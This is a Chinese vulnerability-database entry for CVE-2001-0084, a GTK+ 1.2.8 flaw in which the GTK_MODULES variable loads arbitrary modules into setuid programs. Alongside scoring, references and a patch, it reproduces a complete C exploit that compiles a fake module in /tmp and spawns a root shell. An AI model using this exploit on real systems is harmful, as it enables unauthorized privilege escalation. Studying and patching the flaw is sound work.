CVE-2001-0084
CVSS7.2
发布时间 :2001-02-12 00:00:00
修订时间 :2008-09-05 16:23:13
NMCOES    

[原文]GTK+ library allows local users to specify arbitrary modules via the GTK_MODULES environmental variable, which could allow local users to gain privileges if GTK+ is used by a setuid/setgid program.


[CNNVD]GTK+ 任意可受载模型执行漏洞(CNNVD-200102-069)

        GTK+库存在漏洞。本地用户借助GTK_MODULES环境变量说明任意模型,本地用户在GTK+被setuid/setgid程序使用时提升特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0084
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0084
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200102-069
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2165
(VENDOR_ADVISORY)  BID  2165
http://www.gtk.org/setuid.html
(UNKNOWN)  MISC  http://www.gtk.org/setuid.html
http://archives.neohapsis.com/archives/bugtraq/2001-01/0027.html
(UNKNOWN)  BUGTRAQ  20010103 Claimed vulnerability in GTK_MODULES
http://archives.neohapsis.com/archives/bugtraq/2000-12/0498.html
(UNKNOWN)  BUGTRAQ  20010102 gtk+ security hole.

- 漏洞信息

GTK+ 任意可受载模型执行漏洞
高危 设计错误
2001-02-12 00:00:00 2005-10-20 00:00:00
本地  
        GTK+库存在漏洞。本地用户借助GTK_MODULES环境变量说明任意模型,本地用户在GTK+被setuid/setgid程序使用时提升特权。

- 公告与补丁

        A temporary fix is to add the following line of code to line 215 (approximately in GTK 1.2.8 ) of source file gtkmain. The line should read as follows:
        env_string = getenv ("GTK_MODULES");
        The following line should be added above it:
        if(geteuid() == getuid())

- 漏洞信息 (20526)

GTK+ 1.2.8 Arbitrary Loadable Module Execution Vulnerability (EDBID:20526)
unix local
2001-01-02 Verified
0 V9
N/A [点击下载]
source: http://www.securityfocus.com/bid/2165/info

GTK+ is the Gimp Toolkit, freely available to the public and maintained by the GTK Development Team. A problem exists in the Gimp Toolkit that could allow a user elevated privileges.

The problem occurs in the ability to load modules with the GTK_MODULES environment variable. It is possible to specify a path to modules that may not be part of the GTK+ package using this environment variable. By doing so, a custom crafted module can be loaded by the toolkit. Once loaded by the toolkit, the module is executed. This issue makes it possible for a user with malicious intent to potentially gain elevated privileges, overwrite system files, or execute arbitrary and potentially dangerous code. 

/* (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org].  this will give
   you the euid/egid of a set*id program using gtk+.  this exploit works via
   the GTK_MODULES environmental variable, by tricking gtk to execute arbitrary
   functions/commands with a bogus module. (using gtk_module_init())

   example(./xgtk):
-------------------------------------------------------------------------------
# ls -l /usr/bin/X11/gtk_program
-rwxr-sr-x   1 root     tty        437625 Oct 23  1999 /usr/bin/X11/gtk_program
# cc xgtk.c -o xgtk
# ./xgtk /usr/bin/X11/gtk_program :0.0
[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]
[ program: /usr/bin/X11/gtk_program(->/bin/sh), display: :0.0. ]

[*] making module for gtk+ to execute. (/tmp/gtkm.c)
[*] done, compiling module source file. (/tmp/gtkm.c->/tmp/gtkm.so)
[*] done, checking to see if the module comiled. (/tmp/gtkm.so)
[*] done, setting up the environment. (module&display)
[*] done, executing /usr/bin/X11/gtk_program, the module should load now.
[*] success, module loaded successfully.
[*] id stats: uid: 0, euid: 0, gid: 0, egid: 5.
[*] now executing: /bin/sh.
# 
-------------------------------------------------------------------------------

   note: this will require a valid display to exploit successfully.  also, i'm
         unsure of this for other gtk versions, i would just assume as much
         that this applies to it.
*/
#define GCCPATH "/usr/bin/gcc"  // path to gcc.
#define SRCFILE "/tmp/gtkm.c"   // source to the fake module to load.
#define MODEXEC "/tmp/gtkm.so"  // fake module to load.
#define DISPLAY ":0.0"          // default display. (also argv option)
#define EXECUTE "/bin/sh"       // execute this program.
#include <stdio.h>
#include <sys/stat.h>
int main(int argc,char **argv){
 char cmd[256],syscmd[256],display[256];
 struct stat mod1,mod2,mod3;
 FILE *source;
 fprintf(stderr,"[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]"
 "\n");
 if(argc>1){strncpy(cmd,argv[1],sizeof(cmd));}
 else{
  fprintf(stderr,"[!] syntax: %s </path/to/program> [display]\n",argv[0]);
  exit(-1);
 }
 if(argc>2){strncpy(display,argv[2],sizeof(display));}
 else{strncpy(display,DISPLAY,sizeof(display));}
 if(stat(cmd,&mod1)){
  fprintf(stderr,"[!] failed, %s doesn't seem to exist. (path needed)\n",cmd);
  exit(-1);
 }
 if(stat(GCCPATH,&mod2)){
  fprintf(stderr,"[!] failed, %s compiler doesn't seem to exist.\n",GCCPATH);
  exit(-1);
 }
 fprintf(stderr,"[ program: %s(->%s), display: %s. ]\n\n",cmd,EXECUTE,display);
 fprintf(stderr,"[*] making module for gtk+ to execute. (%s)\n",SRCFILE);
 unlink(SRCFILE);
 unlink(MODEXEC);
 source=fopen(SRCFILE,"w");
 fprintf(source,"#include <stdio.h>\n");
 fprintf(source,"void gtk_module_init(){\n");
 fprintf(source," unlink(\"%s\");\n",SRCFILE);
 fprintf(source," unlink(\"%s\");\n",MODEXEC);
 fprintf(source," fprintf(stderr,\"[*] success, module loaded successfully.\\n"
 "\");\n");
 fprintf(source," fprintf(stderr,\"[*] id stats: uid: %%d, euid: %%d, gid: %%d"
 ", egid: %%d.\\n\",getuid(),geteuid(),getgid(),getegid());\n",EXECUTE);
 fprintf(source," fprintf(stderr,\"[*] now executing: %s.\\n\");\n",EXECUTE);
 fprintf(source," execl(\"%s\",\"%s\",0);\n",EXECUTE,EXECUTE);
 fprintf(source,"}\n");
 fclose(source);
 fprintf(stderr,"[*] done, compiling module source file. (%s->%s)\n",SRCFILE,
 MODEXEC);
 snprintf(syscmd,sizeof(syscmd),"%s -shared -o %s %s 1>/dev/null 2>&1",GCCPATH,
 MODEXEC,SRCFILE);
 system(syscmd);
 fprintf(stderr,"[*] done, checking to see if the module comiled. (%s)\n",
 MODEXEC);
 if(stat(MODEXEC,&mod3)){
  fprintf(stderr,"[!] failed, %s was not compiled properly. (gcc failed)\n",
  MODEXEC);
  exit(-1);
 }
 fprintf(stderr,"[*] done, setting up the environment. (module&display)\n");
 setenv("GTK_MODULES",MODEXEC,1);
 setenv("DISPLAY",display,1);
 fprintf(stderr,"[*] done, executing %s, the module should load now.\n",cmd);
 if(execl(cmd,cmd,0)){
  fprintf(stderr,"[!] failed, %s did not execute properly.\n",cmd);
  unlink(SRCFILE);
  unlink(MODEXEC);
  exit(-1);
 }
}

		

- 漏洞信息

13796
GTK+ Library gtk_program GTK_MODULES Variable Subversion Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-01-02 Unknow
2001-01-02 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

GTK+ Arbitrary Loadable Module Execution Vulnerability
Design Error 2165
No Yes
2001-01-02 12:00:00 2009-07-11 04:46:00
This vulnerability was announced by v9 <v9@fakehalo.org> on January 2, 2001 via the Bugtraq.

- 受影响的程序版本

GTK GTK+ 1.2.8
+ Conectiva Linux 6.0
+ Debian Linux 2.2
+ Mandriva Linux Mandrake 7.2
+ RedHat Linux 7.0
+ S.u.S.E. Linux 7.0
- Sun Solaris 8_sparc

- 漏洞讨论

GTK+ is the Gimp Toolkit, freely available to the public and maintained by the GTK Development Team. A problem exists in the Gimp Toolkit that could allow a user elevated privileges.

The problem occurs in the ability to load modules with the GTK_MODULES environment variable. It is possible to specify a path to modules that may not be part of the GTK+ package using this environment variable. By doing so, a custom crafted module can be loaded by the toolkit. Once loaded by the toolkit, the module is executed. This issue makes it possible for a user with malicious intent to potentially gain elevated privileges, overwrite system files, or execute arbitrary and potentially dangerous code.

- 漏洞利用

This exploit was contributed by V9 &lt;v9@fakehalo.org&gt; :

- 解决方案

A temporary fix is to add the following line of code to line 215 (approximately in GTK 1.2.8 ) of source file gtkmain. The line should read as follows:

env_string = getenv ("GTK_MODULES");

The following line should be added above it:

if(geteuid() == getuid())

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站